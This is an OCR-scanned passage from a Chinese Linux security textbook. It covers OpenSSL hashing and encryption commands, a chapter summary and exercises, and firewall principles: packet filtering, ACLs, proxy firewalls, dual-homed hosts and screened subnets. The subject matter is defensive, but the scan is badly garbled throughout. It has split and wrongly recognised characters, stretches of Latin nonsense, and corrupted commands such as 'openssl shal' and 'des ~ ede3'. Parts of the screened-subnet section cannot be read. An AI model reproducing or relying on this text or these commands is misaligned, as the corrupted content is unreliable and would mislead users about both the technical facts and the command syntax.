钥 安全 的 存储 和 分 发 。OpenSsL 提供 了 文本 数据 库 , 文 持 证 书 密 钥 产 生 .请 求 产生 .证 书签 
A D s UE SED RE o 
OpenSSL 中 支持 的 消息 摘要 算法 包括 MD2, MD4, MD5, MDC2, SHA1, RIPEMD -160, 
SHAI fll RIPEMD-160 产生 160 f "ai (E ,其 他 的 产生 128 位 喻 希 值 。 使 用 以 下 命令 可 以 
使 用 SHA1 算法 计算 出 test. txt 的 哈 希 值 并 存储 在 result. txt 中 。 


openssl shal - out result.txt test.txt 


OpenSSL x BE eR G15Blowfish, CAST5, DES, 3DES, AES, IDEA, RC2, RC4 
及 RC5, ŒH 3DES 对 test. doc 文件 进行 加 、 解 密 操 作 如 下 ,加 密 结 果 存 储 到 result. bin 
中 。 输 入 设 定 密码 ,将 加 密 的 内 容 解 密 后 输出 到 plan. doc 中 。 


openssl enc — des3 — salt — in test.doc - out result. bin 
openssl enc — des ~ ede3 — ofb -d —- in result. bin - out plain. doc - pass pass:crackme 


Linux 中 的 OpenSLL 包 功 能 哩 大 ,使 用 此 软件 包 可 以 实现 多 类 加 密 算 法 、 信 息 安 全 
功能 。 


12.8 本 草 小 结 


本 章 简单 介绍 了 Linux 常用 的 安全 框架 、 安 全 协议 及 常用 杀毒 程序 的 安装 。 首 先 介绍 
的 Linux 安全 框架 是 为 了 给 读者 普及 Linux 安全 的 一 个 大 致 框架 ,让 读者 从 全 局 了 解 
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Linux 安全 所 涉及 的 系统 安全 .数据 安全 .通信 安全 .安全 应 用 程序 等 4 个 方面 。 接 看 详细 
介绍 了 Linux 安全 模型 LSM, A SELinux 和 传统 Linux 安全 为 实例 讲解 Linux 安全 ,其 重 
点 介绍 MAC 和 DAC。 然 后 再 对 Linux 安全 相对 重要 的 文件 权限 进行 了 介绍 ,并 对 权限 配 
置 做 了 实践 。 最 后 从 理论 上 讲 了 一 些 Linux 安全 协议 ,希望 读者 能 够 理解 党 用 Linux 安全 
协议 。 


习题 12 


. 简 述 LSM 和 SELinux 的 关系 。 

. 使 用 OpenSSL 4 *. bin 文件 进行 BASE64 编码 。 

. fa Linux 系统 上 运行 的 IPSec 协议 工作 过 程 。 

. 在 自己 的 Linux 系统 上 面 安 装 Clam 杀毒 程序 ,并 进行 病毒 数据 库 的 更 新 。 
. 总 绪 目 主 访问 控制 和 强制 访问 控制 的 异同 点 并 和 侧 述 其 相同 点 。 
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13.1. Bj CEL HE 


13.1.1 防火 墙 的 概念 


防火 墙 原 指 建筑 物 中 用 来 隔断 火灾 的 隔断 墙 ,在 网 络 中 引申 为 保护 内 网 
安全 的 防护 墙 。 理 论 上 ,与 传统 防火 墙 类 似 的 网 络 防 火 墙 也 是 防止 外 部 网 络 
上 的 各 种 危险 蔓延 到 内 部 网 络 。 简 言 之 ,防火 墙 就 是 一 个 或 一 组 在 网 络 之 间 
进行 访问 控制 的 路 由 器 或 计算 机 。 它 通过 监控 、 检 测 、 限制 或 更 改 通过 它 的 
数据 流 , 尽 可 能 地 对 外 部 网 络 屏蔽 有 关 的 被 保护 网 络 的 信息 和 结构 ,实现 对 
网 络 的 安全 保护 。 

防火 墙 其 实 是 一 种 高 级 的 访问 控制 设备 ,处 于 不 同 的 网 络 安全 域 之 中 ， 
是 不 同安 全 域 之 间 的 数据 传输 的 唯一 通道 ,能 够 根据 国家 、 企 业 的 安全 政策 
实现 相应 的 安全 策略 ,如 允许 .拒绝 .监控 .记录 进出 行为 。 其 需 满 足以 下 
条 件 。 

(1) 内 外 网 络 所 有 数据 流 需 经 过 防火 墙 。 

(2) 所 有 能 够 经 过 防火 墙 的 数据 均 需 满足 其 安全 策略 。 

(3) 防火 墙 能 够 日 我 免疫 ,抵抗 常用 攻击 。 

(4) 防火 墙 具 有 完善 的 日 志 、 报 党 监控 功能 ,良好 的 用 户 接 口 。 

防火 墙 自身 须 具 有 较 强 的 抗 攻击 能 力 , 是 安全 服务 、 网络 信息 安全 的 基 
础 设施 。 图 13-1 所 示 为 防火 墙 示 意图 。 


13.1.2 ”防火墙 的 原理 


防火 墙 的 工作 原理 是 按照 预定 义 的 规则 ,监控 通过 防火 墙 的 数据 流 。 根 
据 其 规则 允许 或 拒绝 数据 通过 ,并 记录 该 数据 流 的 连接 源 、 服 务 端 的 通信 和 量 
及 数据 分 析 绪 末 ,以便 管理 员 进 行 监测 与 跟踪 ,并且 所 有 的 防火 二 必须 能 鲍 
防火 墙 拉 术 的 核心 思想 是 在 不 安全 的 网 络 环境 下 构造 一 种 相对 安全 的 
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13-1 防火 墙 示 意图 


内 部 网 络 环境 。 即 在 开放 的 网 络 大 环境 中 产生 一 个 逻辑 上 相对 封 团 的 小 环境 满足 人 们 对 内 
网 安全 的 要 求 。 本 质 上 讲 ,防火墙 就 是 一 种 被 动 的 数据 访问 控制 技术 ,在 内 外 网 边界 上 建立 
网 络 通信 监控 系统 实现 内 网 安全 。 

防火 墙 是 一 种 网 络 安 全 控制 机 制 , 它 既 可 阻止 来 自 外 部 网 络 的 未 授权 或 未 验证 的 数据 
对 内 部 网 络 的 访问 ,也 可 允许 内 部 网 用 户 对 外 网 进行 访问 ,具体 功能 如 下 ， 

CD 过 滤 进 出 内 网 的 数据 包 ,管理 其 访问 行为 。 

(2) 记录 通过 防火 墙 的 数据 信息 。 

(3) 蔡 止 危险 访问 行为 ,过 滤 和 危险 端口 ,监测 报警 网 络 攻击 。 

(4) 设置 外 加 内 状态 过 滤 规 则 ,抵挡 拒绝 服务 攻击 。 

(5) 访问 控制 能 力 。 

防火 墙 的 主要 功能 构件 包括 认证 功能 CAF) .完整 性 功能 (IF) .访问 控制 功能 C(ACF) 、 审 
计 功 能 CAUDF) 和 访问 执行 功能 C(AEF) 。 

(1) 认证 功能 C(AF)。 认 证 就 是 确认 实体 所 声称 的 身份 。 对 具有 通信 关系 的 主客 体 , 认 
证 提供 了 对 主体 身份 证 实 的 功能 。 一 个 主体 可 以 有 多 个 不 同 标识 的 实体 ,主体 可 以 通过 实 
体 认 证 服务 证 实 和 目 身 所 声称 的 身份 。 另 有 一 种 认证 方式 称 为 连接 认证 , 它 保 证 连接 中 的 数 
据 发 送 方 的 真实 性 和 所 发 数据 的 完整 性 。 

(2) 完整 性 功能 (IF) 。 完 整 性 功能 确保 报 文 传送 过 程 中 数据 的 部 分 未 授权 的 更 改 , 如 
插入 、 删 除 或 蔡 换 。 该 功能 虽然 不 能 阻止 和 信 侵 事件 的 发 生 , 但 能 探测 出 数据 是 否 发 生 了 修 
改 ,并 标记 已 发 生 修 改 的 信息 ,防止 基于 网 络 的 搭 线 镶 听 。 

(3) 访问 控制 功能 (ACF)。 网 络 访问 控制 功能 决定 是 否 人 允许 报 文 通过 防火 场 。 如 果 进 
入 网 络 安全 域 的 报 文 传送 过 程 中 没有 访问 控制 功能 ,那么 任意 访问 均 是 可 能 的 ,包含 恶意 代 
码 的 传送 也 不 能 被 阻止 。 因 此 ,访问 控制 功能 ACK 是 必需 的 。 

访问 控制 功能 不 仅 对 进入 网 络 安全 域 的 传送 单元 强制 执行 ,而 且 离 开 网 络 安全 域 时 也 
需要 执行 访问 控制 。 否 则 , 便 不 能 禁止 内 网 对 部 分 不 安全 外 网 的 访问 或 系 忙 时 间 禁 止 非 重 
要 用 户 暂 时 性 的 外 网 访问 。 再 者 ,访问 控制 功能 还 能 防止 用 户 信息 泄露 。 

(4) 审计 功能 (AudF)。 人 简单 地 说 ,审计 功能 即 是 重要 事件 日 志 记 录 功 能 ,而 哪些 事件 
补 划 分 为 重要 事件 则 取决 于 制定 的 有 效 安 全 策略 。 具 体 来 说 一 个 防火 墙 系 统 的 所有 构件 都 
需要 用 一 整套 一 致 的 方式 记录 信息 ,这 些 日 志 信 息 可 以 用 于 通知 应 用 程序 .审计 跟踪 分 析 工 
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具 、 人 侵 探 测 引擎 和 记 账 代理 等 。 也 可 以 提供 给 负责 系统 安全 监视 的 授权 人 员 。 

(5) 访问 执行 功能 CAEF)。 访 问 执行 功能 即 是 执行 上 述 的 认 知 功能 .完整 性 功能 等 。 
如 末 上 述 功 能 检测 均 通 过 , 则 允许 通过 防火 墙 。 

防火 墙 的 构件 分 为 集中 式 和 分 布 式 两 种 ,对 于 集中 式 , 防 火 墙 位 于 网 络 的 同一 位 置 , 极 
易 成 为 网 络 阻 窜 点 ,造成 系统 瓶 贷 问 题 ; 对 于 分 布 式 ,每 个 位 置 点 均 有 较 少 功 能 的 构件 , 功 
能 构件 的 分 布 式 安置 减少 了 在 网 络 边界 的 系统 性 能 开销 :而且 在 网 络 内 部 的 功能 构件 能 
够 并 发 执行 。 所 以 功能 构件 的 元 余 分 布 可 以 大 大 提高 系统 的 可 靠 性 、 可 用 性 和 灾难 防护 
能 力 。 


13.2. 防火 十 核心 扩 术 与 分 类 


1. 包 过 滤 

1) 包 过 滤 防 火 墙 的 原理 

包 过 滤 技 术 是 查看 所 流 经 的 数据 包 的 包头 (header) ,根据 数据 包 的 源 IP 地 址 决定 整个 
包 的 命运 。 可 能 决定 丢弃 (DROP) 这 个 包 , 也 可 能 接受 (ACCEPT) 这 个 包 ,或 者 执行 其 他 更 
复杂 的 动作 。 

包 过 滤 技 术 是 指 网 络 设 备 ( 踏 由 器 或 防火 墙 ) 根 据 包 过 滤 规 则 检查 所 接收 的 每 个 数据 
包 ,做 出 允许 数据 包 通 过 或 丢弃 数据 包 的 决定 , 包 过 滤 规 则 主要 基于 IP 包头 (数据 包 的 信息 
五 元 组 ) 信 息 设 置 : TCP/UDP 的 源 或 目的 端口 号 ; 协议 类 型 ,如 TCP,UDP,ICMP 等 ; 源 
或 目的 IP 地 址 ; 数据 包 的 入 接口 和 出 接口 。 数 据 包 中 的 信息 如 果 与 某 一 条 过 滤 规 则 (主要 
是 访问 控制 列表 ) 相 匹配 并 且 该 规则 允许 数据 包 通 过 , 则 该 数据 包 会 被 转发 ,如 果 与 某 一 条 
过 滤 规 则 匹配 但 该 规则 拒绝 数据 包 通 过 , 则 该 数据 包 会 被 丢弃 。 如 果 没 有 可 匹配 的 规则 , 炭 
认 规 则 会 决定 数据 包 是 被 转 发 还 是 被 于 弃 。 

包 过 滤 防 火 墙 的 核心 技术 是 访问 控制 列表 。 访 问 控 制 列 表 (CACL) 是 应 用 在 路 由 器 接 
口 的 指令 列表 ( 即 规则 )。 这 些 指 令 列 表 用 来 告诉 路 由 姑 ,哪些 数据 包 可 以 接收 ,哪些 数据 包 
需要 拒绝 ,其 基本 原理 为 ACL 使 用 包 过 滤 技 术 , P is E BUR OSI 七 层 模型 的 第 三 层 及 
第 四 层 包 头 中 的 信息 ,如 源 地 址 .目的 地 址 、. 源 端口 .目的 端口 ,根据 预先 定义 好 的 规则 ,对 包 
进行 过 滤 ,从 而 达到 访问 控制 的 目的 。 

ACL 是 一 组 规则 的 集合 , 它 应 用 在 路 由 右 的 某 个 接口 上 ,对 路 由 兹 接口 而 言 ,访问 控制 
列表 有 两 个 方向 。 中 出 : 已 经 过 路 由 器 的 处 理 , 正 离开 路 由 器 接口 的 数据 包 。 四 入 : 已 到 
达 路 由 器 接口 的 数据 包 ,将 被 路 由 器 处 理 。 如 果 对 接口 应 用 了 访问 控制 列表 ,也 就 是 说 该 接 
口 应 用 了 规则 ,那么 路 由 器 将 对 数据 包 应 用 该 组 规则 进行 顺序 检查 。 包 过 滤 的 基本 流程 如 
图 13-2 所 示 。 

(1) 如 果 匹 配 第 一 条 规则 , 则 不 再 往 下 检查 ,路 由 器 决定 该 数据 包 人 允许 通过 或 拒绝 
通过 。 

(2) 如 果 不 匹 配 第 一 条 规则 , 则 依次 往 下 检查 ,直到 有 任何 一 条 规则 匹配 ,路 由 硕 决 定 
该 数据 包 人 允许 通过 或 拒绝 通过 。 

(3) 如 果 最 后 没有 任何 一 条 规则 匹配 , 则 路 由 兹 根据 默认 的 规则 将 丢弃 该 数据 包 , 由 此 
可 见 ,数据 包 要 么 被 允许 通过 ,要 么 被 拒绝 通过 。 
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图 13-2 包 过 滤 的 基本 流程 






2) 包 过 滤 防 火场 的 发 展 

包 过 滤 防 火 墙 的 发 展 经 历 了 从 简单 包 过 滤 到 状态 检测 包 过 滤 的 过 程 。 简 单 包 过 滤 的 防 
火 墙 并 不 建立 连接 状态 ,前 后 报 文 是 无 关 的 ,不 检查 包 的 数据 区 ,只 对 数据 包 的 报 文 头 部 进 
行 检 测 。 状 态 检 测 包 过 滤 防 火 墙 需要 建立 连接 ,前 后 报 文 是 相关 的 ,具有 相同 地 址 的 报 文 会 
经 过 同一 连接 经 过 防火 墙 。 该 防火 墙 也 不 检测 包 的 数据 区 ,检测 报 文 的 头 部 来 建立 连接 。 
其 工作 原理 如 图 13-3 Bra. 


连接 状态 表 





图 13-3 ”状态 检测 包 过 滤 防 火 墙 
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安装 在 路 由 器 上 。 路 由 器 是 内 部 网 络 与 Internet 连接 必 不 可 少 的 设备 ,因此 在 原 有 网 络 上 
增加 这 样 的 防火 墙 几 乎 不 需要 任何 额外 的 费用 。 

数据 包 过 滤 防 火 墙 的 缺点 如 下 。 

(1) 非法 访问 一 旦 突破 防火 墙 , 即 可 对 主机 上 的 软件 和 配置 漏洞 进行 攻击 。 

(2) 数据 包 的 源 地 址 .目的 地 址 及 IP 的 端口 号 都 在 数据 包 的 头 部 ,很 有 可 能 被 窃听 或 
假冒 。 

(3) 包 过 滤 只 能 控制 数据 包 包 头 信 息 , 不 能 控制 数据 包 内 容 部 分 的 信息 。 只 能 选择 人 允 
许 或 拒绝 某 服务 ,不 能 辨别 服务 所 涉及 的 具体 对 象 。 例 如 ,针对 FTP 服务 , 包 过 滤 技 术 只 能 
人 允许 或 拒绝 下 载 某 些 文件 ,不 能 根据 需要 判定 下 载 该 文件 的 部 分 内 容 或 拒绝 部 分 内 容 。 
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(4) 包 过 滤 规 则 较 复 傈 ,不同 的 服务 需要 制定 其 独 有 的 过 滤 规 则 。 
2. 应 用 代理 防火 墙 
应 用 代理 防火 墙 运行 在 两 个 网 络 之 间 。 对 于 客户 来 说 , 它 像 是 一 台 真 的 服务 兹 一 样 , 而 
对 于 外 界 的 服务 甫 来 说 , 它 又 是 一 人 台 客 户 机 。 应 用 代理 防火 场 的 工作 原理 如 图 13-4 所 示 。 





ms "m- 


图 13-4 应 用 代理 防火 墙 的 工作 原理 


(1) 应 用 层 防 火 墙 由 两 部 分 组 成 : 代理 服务 器 和 屏 项 路 由 器 。 应 用 层 防火 墙 可 以 理解 
为 用 户 应 用 层 的 通信 业务 ,可 以 处 理 存 储 转发 通信 业务 及 交互 式 通信 业务 。 这 种 防火 墙 技 
术 把 屏蔽 路 由 器 技术 和 软件 代理 技术 结合 在 一 起 ,由 屏蔽 路 由 器 负责 网 络 的 互联 ,进行 严格 
的 数据 选择 ,应 用 代理 则 提供 应 用 层 服 务 的 控制 ,内 部 网 络 只 接受 代理 服务 器 提出 的 服务 请 
求 ,拒绝 外 部 网 络 其 他 节点 的 直接 请 求 。 代 理 服务 器 接收 到 用 户 的 请 求 后 ,会 检查 用 户 请 求 
的 站 点 是 否 符合 公司 的 要 求 , 如 果 公 司 允 许 用 户 访问 某 站 点 ,代理 服务 器 就 会 像 一 个 客户 一 
FE ,去 该 站 点 取 回 所 需 信 息 再 转发 给 客户 。 这 种 防火 墙 通过 一 种 代理 (Proxy) 技 术 参 与 到 
一 个 TCP 连接 的 全 过 程 。 从 内 部 发 出 的 数据 包 经 过 这 
样 的 防火 墙 处 理 后 ,就 好 像 是 源 于 防火 墙 外 部 网 卡 一 
样 , 从 而 可 以 达到 隐藏 内 部 网 结构 的 作用 。 应 用 层 防 火 

| 墙 的 工作 原理 如 图 13-5 所 示 。 
"Telnet (2) 应 用 层 防火 墙 的 优点 : 代理 防火 墙 为 它们 所 支 
| 持 的 协议 提供 全 面 的 协议 意识 安全 分 析 。 相 比 于 那些 
| 只 考虑 数据 包头 信息 的 产品 ,这 使 得 它们 能 做 出 更 安全 
六 火 地 的 判定 。 例 如 ,特定 的 支持 FTP 的 代理 防火 墙 , 它 能 够 
监视 实际 流出 命令 通道 的 FTP 命令 ,并 能 够 停止 任何 禁 
止 的 活动 。 由 于 服务 器 被 代理 防火 墙 所 保护 ,而 且 代 理 
防火 墙 允许 协议 意识 记录 ,因此 使 得 识别 攻击 方法 及 备 

份 现 有 记录 更 容易 。 

由 于 应 用 层 防 火 墙 需要 对 应 用 层 的 内 容 进行 检测 ， 


因此 需要 耗费 大 量 的 网 络 和 系统 资源 ,对 系统 性 能 的 要 


图 13-5 ”应 用 层 防火 墙 工 作 原 理 — 求 较 高 。 
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13.3 ”防火 墙 防御 体系 结构 类 型 


防火 场 主 要 的 体系 结构 包 合 包 过 滤 型 防火 才 \, 双 箱 / 多 御 主 机 防火 坪 、 锌 屏 杖 主机 防火 


13.3.1 aT XUB EENH E Ar 8 T4 
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络 接口 分 别 连接 内 外 网 ,因此 它 既 可 与 内 网 通信 ,也 可 与 外 网 络 通信 ,但 内 外 网 之 间 的 数据 
流 均 被 双 答 主 主机 系统 所 切断 ,所 以 内 外 网 不 可 直接 通信 。 

双 和 窜 主 主机 结构 采用 主机 替代 路 由 器 执行 安全 控制 功能 ,类 似 于 包 过 滤 防 火 墙 。 双 和 窒 
主机 即 一 台 配 有 多 个 网 络 接口 的 主机 , 它 可 以 用 来 在 内 部 网 络 和 外 部 网 络 之 间 进 行 寻 径 。 
如 案 一 台 双 循 主 主机 的 寻 径 功能 被 荣 止 了 , 则 这 个 主机 可 以 隔离 与 它 相 连 的 内 部 网 络 和 外 
部 网 络 之 间 的 通信 ,而 与 它 相 连 的 内 部 和 外 部 网 络 都 可 以 执行 由 它 所 提供 的 网 络 应 用 ,如 宁 
这 个 应 用 允许 ,它们 就 可 以 共享 数据 。 这 样 驶 剑 证 内 部 网 络 和 外 部 网 络 的 某 些 万 点 之 间 可 
以 通过 双 箱 主机 上 的 共享 数据 传递 信息 ,但 内 部 网 络 与 外 部 网 络 之 间 却 不 能 传递 信息 ,从 而 
达到 保护 内 部 网 络 的 作用 。 它 是 外 部 网 络 用 户 进 入 内 部 网 络 的 唯一 通道 ,因此 双 答 主机 的 
安全 至 关 重 要 ,关键 在 于 它 的 用 户口 令 控 制 安全 。 

如 果 入 侵 者 得 到 了 双 和 窒 主 主机 的 访问 权 , 内 网 
就 会 被 侵 和 人 ,为 了 保障 内 网 的 安全 ,需要 在 双 笨 主 
主机 上 禁止 路 由 功能 ,并 且 设 置身 份 认证 机 制 。 双 
TH EE BL RI jj A des AS 2 E 4] JE 3$ fn] ER. Hor FAN aa 
网 络 和 外 部 网 络 之 间 ,如 图 13-6 所 示 。 

双 箱 主 主 机 能 提供 高 级 别 的 控制 功能 。 寿 禁 
止 外 部 网 络 与 内 部 网 络 之 间 进 行 数据 包 传 输 ,那么 
一 旦 在 内 部 网 络 上 发 现 了 任何 具有 外 部 源 的 数据 
包 , 就 可 以 断定 存在 某 种 安全 问题 。 在 某 些 情 况 






防火 墙 双 窒 主 主机 





下 , 双 宿 主 主机 将 允许 管理 员 拒 绝 声 称 提供 特殊 服 i 
务 , 但 又 不 包含 正确 的 数据 种 类 的 连接 ,而 数据 包 Np Ry 
过 滤 系 统 则 难以 实现 这 个 等 级 的 控制 。 Web 服 务 器 电子 商务 服务 器 


双 牡 主 主 机 使 用 两 种 方式 来 提供 服务 ,一 种 是 13-6 ” 双 宿 主 主机 体系 结构 
用 户 直 接 登 录 到 双 宿 主 主机 上 来 提供 服务 , 男 一 种 
是 在 双 宿 主 主机 上 运行 代理 服务 器 。 

第 一 种 方式 需要 在 双 宿 主 主机 上 开 很 多 账号 ,这 会 带 来 以 下 危险 。 

CD 用 户 账 号 的 存在 给 入 侵 者 提供 相对 容易 的 入 侵 通 站 ,每 一 个 账号 通常 会 有 一 个 可 
重复 使 用 的 密码 ,这 样 很 容易 被 人 侵 者 破解 。 

(2) 由 于 用 户 的 行为 是 不 可 预知 的 ,这 会 给 入 侵 检 测 和 之 来 很 大 的 腰 烦 。 

第 二 种 方式 的 问题 相对 要 少 很 多 ,并 且 有 些 服务 (如 HTTP、SMTP) 本 生 的 特点 就 是 
“存储 转发 ”型 的 ,很 适合 进行 代理 。 在 双 答 主 主机 上 可 以 运行 多 种 代理 服务 程序 , 当 内 网 要 
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访问 外 网 时 ,必须 先 通过 服务 器 认证 ,然后 才 可 以 通过 代理 服务 程序 访问 外 网 。 
13.3.2 基于 代理 型 的 防火 墙 结构 


代理 型 防火 墙 安 疲 在 内 部 网 和 外 部 网 的 隔离 点 ,起 看 监视 和 隔离 应 用 层 通 信 流 的 作用 。 
同时 也 和 背 纺 合 出 入 过 滤 带 的 功能 。 

代理 服务 型 防火 卉 通常 由 两 部 分 构成 ,一 是 服务 如 问 程 序 , 二 是 客户 端 程 序 。 客 户 绵 程 
序 与 中 间 广 点 连接 ,中 辐 市 点 再 与 要 访问 的 外 部 服务 带 实 际 连接 。 与 包 过 渡 型 防火 墙 不 同 
的 是 ,内 部 网 络 与 外 部 网 络 之 间 不 存在 直接 的 连接 ,同时 提供 日 志和 审计 服务 。 代 理 是 企图 
在 应 用 层 实 现 防火 墙 的 功能 ,代理 的 主要 特点 是 有 状态 性 ,代理 能 提供 部 分 与 传输 有 关 的 状 
AS ,能 完全 提供 与 应 用 相关 的 状态 和 部 分 传输 方面 的 信息 ,代理 也 能 处 理 和 管理 信息 。 

代理 防火 场 工 作 于 应 用 层 ,针对 不 同 的 应 用 层 协 议 宕 要 开发 不 同 的 代理 模块 。 代 理 型 
防火 墙 通 过 编程 来 弄 清 用 户 应 用 层 的 流量 ,并 能 在 用 户 层 和 应 用 协议 层 提供 访问 控制 。 而 
且 还 可 用 来 保持 一 个 所 有 应 用 程序 使 用 的 记录 。 记 录 和 控制 所 有 进出 流量 的 能 力 是 应 用 层 
网 关 的 主要 优点 之 一 。 代 理 防火 墙 的 工作 方式 如 图 13-7 Bron, 


应 用 协议 分 析 
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图 13-7 代理 型 防火 墙 的 工作 方式 


从 图 13-7 中 可 以 看 出 ,代理 服务 希 作 为 内 部 网 络 客户 奖 的 服务 硕 ,截留 所 有 应 用 请 求 ， 
并 向 客户 端 转 发 响应 。 代 理 客户 (Proxy Client) 负责 代表 内 部 客户 端 向 外 部 服务 器 发 出 请 
求 , 同 时 间 代 理 服 务 器 转发 啊 应 。 

当 某 用 户 ( 不 管 是 远程 的 还 是 本 地 的 ) 想 和 一 个 运行 代理 的 网 络 连 接 联 系 时 ,此 代理 (应 
用 层 网 关 ) 接 受 这 个 连接 ,人 然后 对 连接 请 求 的 各 个 域 进行 检查 。 如 果 此 连接 请 求人 符合 预定 的 
安全 策略 或 规则 ,代理 防火 墙 便 会 在 用 户 和 服务 之 间 建 立 一 个 " 桥 ” ,从 而 保证 其 通信 。 对 不 
符合 预定 的 安全 规则 的 , 则 阻塞 或 抛弃 。 换 句 话说 ,“ 桥 "* 上 设置 了 很 多 控制 。 

代理 服务 器 的 功能 如 下 。 

1) 提供 安全 保护 

将 一 个 单位 的 计算 机 网 络 直接 连 入 Internet, 相 当 于 在 网 络 上 敞开 了 一 个 没有 门卫 把 
守 的 大 门 。 虽 然 内 部 网 络 的 计算 机 用 户 访 问 Internet 方便 了 ,但 是 内 部 网 络 上 的 计算 机 、 所 
存储 的 信息 和 数据 也 全 部 又 露 在 全 世界 计算 机 网 络 用 户 的 视野 内 。 用 户 的 信息 可 能 被 舍 
取 、 秘 密 可 能 被 泄露 .数据 可 能 被 筑 改 .计算 机 可 能 被 攻击 ,如 果 想 避免 这 种 情况 的 发 生 , 就 


第 13 章 防火 墙 技 术 原 理 及 应 陆 


必须 关闭 这 扇 大 门 , 断 开 内 部 网 络 和 Internet 的 直接 连接 , 改 用 代理 服务 器 这 种 间接 的 连接 
方法 ,继续 对 内 部 网 络 用 户 提 供 Internet 访问 服务 。 人 代理 服 务 硕 除了 访问 代理 功能 外 ,还 可 
以 提供 具有 方 回 性 的 信息 过 滤 功 能 ,访问 管制 功能 .审计 功能 、 安 全 报警 功能 和 日 志 功 能 ,这 
将 有 将 地 增强 网 络 的 安全 性 ,相当 于 在 内 外 部 网 络 之 间 构 筑 起 一 个 保护 内 部 网 络 的 防火 墙 ， 
使 Internet 上 的 用 户 看 不 到 用 户 的 内 部 网 络 , 只 看 得 见 相 当 于 防火 场 的 代理 服务 硕 计 算 机 。 
即使 这 人 台 计 算 机 发 生 了 问题 ,外 部 网 络 仍然 无 法 与 被 保护 的 内 部 网 络 直 接连 接 。 通 过 代理 
服务 器 提供 的 防火 墙 动 态 包 过 滤 功 能 ,管理 员 还 可 以 对 通过 代理 服务 器 的 信息 流 进行 完全 
的 控制 ,安全 程度 得 到 了 提高 。 

除了 可 以 代理 内 部 网 用 户 访 问 Internet 之 外 ,代理 服务 硕 还 提供 逆 癌 代理 功能 。 

X FE. ,就 可 以 在 不 牺牲 内 部 网 安全 性 能 的 情况 下 进行 Internet 信息 发 布 。 代 理 服务 融 
可 以 查询 来 日 Internet 信息 的 请 求 , 逆 癌 传递 到 位 于 代理 服务 冀 后 面 内 部 网 段 上 的 服务 冀 1 
对 于 Internet 上 的 外 界 用 户 来 说 ,代理 服务 兹 扮演 看 Internet 内 部 网 站 服务 天 的 角色 , 赣 回 
代理 服务 为 Internet 信息 发 布 提供 了 灵活 与 安全 的 保护 手段 。 

2) 控制 访问 内 容 

通过 代理 服务 大 ,网 络 管理 员 在 提供 Internet 访问 服务 时 ,可 以 很 容易 的 对 局 域 网 用 户 
进行 访问 权限 的 管理 。 网 络 管 理 员 不 但 能 够 做 到 只 允许 所 授权 的 局 域 网 用 户 访 问 
Internet ,还 能 够 控制 这 些 用 户 在 哪 段 时 间 使 用 哪 台 计算 机 ,或 在 哪个 网 络 地 址 ,访问 哪些 类 
型 和 哪些 内 容 的 Internet 服务 。 

代理 服务 型 防火 场 的 系统 续 构 图 如 图 13-8 Bron, 


HTTP 答 复 HTTP ANM HTTP 答复 
| | Proxy WWW Server | 
对 请 求 的 地 址 进行 判断 siz 
AREEN 


| HTTP 请 求 










HITP 请 求 HTTP 请 求 


图 13-8 代理 服务 型 防火 墙 的 系统 结构 图 


设想 用 代理 技术 限制 用 户 对 某 些 特定 网 站 的 访问 ,对 于 每 一 个 用 户 的 请 求 (Internet 请 
求 , 由 浏览 器 发 出 ) ,如果 用 户 每 次 从 Internet Explorer 输入 所 要 访问 网 站 的 IP 地 址 ,代理 
程序 得 到 此 IP 地 址 并 把 它 与 代理 所 设 定 的 禁止 访问 的 网 站 的 IP 地 址 进行 比较 ,如 果 用 户 
所 要 访问 的 网 站 的 TP 地 址 是 代理 程序 所 禁止 的 , 则 返回 拒绝 访问 的 信息 ,如 果 用 户 所 要 访 
问 的 网 站 的 IP 地 址 不 是 代理 程序 所 禁止 的 , 则 允许 其 进行 正 第 的 访问 。 


13.3.3 基于 屏 沿 子 网 的 防火 场 结 构 


屏蔽 子 网 (Screened Subnet) ,这 种 方法 是 在 内 部 网 络 和 外 部 网 络 之 间 建 立 一 个 被 隔离 
的 子 网 ,用 两 侣 分 组 过 小 路 由 各 将 这 一 于 网 分 别 写 内 部 网 络 和 外 部 网 络 分 开 。 在 很 多 实现 
中 ,两 个 分 组 过 滤 路 由 副 放 在 子 网 的 两 端 ,在 于 网 内 构成 一 个 “ 非 宗 事 区 ”DMZ。 有 的 屏蔽 
了 于 网 中 还 设 有 一 堡垒 主机 作为 唯一 可 访问 点 , 文 持 终 闪 交互 或 作为 应 用 网 关 人 代理。 这 种 配 
E ET JE Bor e DC. d Pe A EL. 9] E LS Pr E BE VL IST h ic 9 85 36 tir 

如 采 攻 击 者 试图 完全 破坏 防火 二 ,他 必须 重新 配置 连接 3 P P0 BS get H aie. BE AS UJ Bor E 
接 又 不 能 把 目 己 锁 在 外 面 , 同 时 又 不 使 目 己 锌 发 现 , 这 也 是 可 能 的 。 但 大 花 止 网 络 访问 
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路 申 闫 或 只 允许 内 网 中 的 茶 些 主机 访问 它 , 则 攻击 会 变 得 很 困难 。 在 这 种 情况 下 ,攻击 
A Act AS EBL. Aa DEA A EL, FE a E OR a BF ic H ir» EP ae EP RE S| 
ACER. 


Bt illc DO AS R E t B5) ez f] SE H3 JE SX, 73 V3) i BE ICE FH ue «RE 1 HB Jd 32 Id 28 ie Be, Ah 


图 13-9 所 示 。 一 个 位 于 周边 网 与 内 部 网 络 之 间 , 另 一 个 位 于 周边 网 与 外 部 网 络 (通常 为 因 
特 网 ) 之 间 。 为 了 侵入 用 这 种 体系 结构 构筑 的 内 部 网 络 ,侵袭 者 必须 通过 两 个 路 由 器 。 即 使 
侵袭 者 设法 侵入 了 保 令 主机 ,他 仍 将 必须 通过 内 部 路 由 器 ,这 就 消除 了 内 部 网 络 的 单一 侵入 
点 ,也 可 以 在 外 部 世界 与 内 部 网 络 之 间 建 立 分 层 的 周边 网 。 信 任 度 较 低 和 易 受 侵袭 的 服务 
被 放置 在 外 层 的 周边 网 上 ,远离 内 部 网 络 。 这 样 即 使 侵袭 者 侵入 了 外 层 周 边 网 上 的 计算 机 ， 


由 于 在 外 层 周 边 网 和 内 部 网 络 之 间 有 附加 安全 层 , 他 还 是 难于 成 功 地 侵 磺 内 部 的 计算 机 。 
但 是 ,对 不 同 的 层 必须 有 不 同 的 含义 ,如 来 每 一 层 中 的 过 滤 系 统 做 同样 的 事情 ,那么 附加 层 
将 不 会 提供 任何 的 附加 安全 。 


| 

外 部 路 由 1 £2 3: Ky] 

| T 
内 部 路 由 , TIRES. 
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图 13-9 屏蔽 子 网 体系 结构 


与 其 他 体系 结构 的 防火 墙 相 比 ,屏蔽 子 网 体系 结构 防火 墙 有 较 大 的 优越 性 ,安全 性 更 
